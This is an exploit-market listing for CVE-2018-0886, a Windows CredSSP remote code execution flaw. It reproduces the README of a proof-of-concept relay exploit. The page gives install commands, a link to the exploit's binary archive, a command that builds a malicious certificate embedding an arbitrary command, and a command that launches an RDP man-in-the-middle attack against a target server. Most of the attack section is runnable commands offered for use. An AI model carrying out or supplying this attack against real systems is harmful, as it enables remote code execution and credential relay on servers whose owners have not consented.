[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft Credential Security Support Provider - Remote Code Execution Vulnerability

Author
Preempt
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-30174
Category
remote exploits
Date add
13-04-2018
CVE
CVE-2018-0886
Platform
windows
# credssp
 
This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay. 
 
 
Written by Eyal Karni, Preempt 
ekarni@preempt.com 
 
# Build
 
## Instructions (Linux)
If you are using Ubuntu 14 , check the install file.. 
It was tested on Ubuntu 16.04. 
 
```
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
```
 
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44453.zip
 
* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography).  
* A different version of openssl needed to be installed for this to run successfully.  The install script does that. 
* Please follow the instructions in the described order. 
 
# Running the exploit 
 
 
Export a certificate suitable for Server Authentication from any domain.
 
 
To generate a suitable certificate for the command to execute : 
 
```
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 
```
 
(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)
 
To run the attack script: 
 
```
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
```
 
More details are in the usage section of the scripts(--help).

#  0day.today [2024-11-16]  #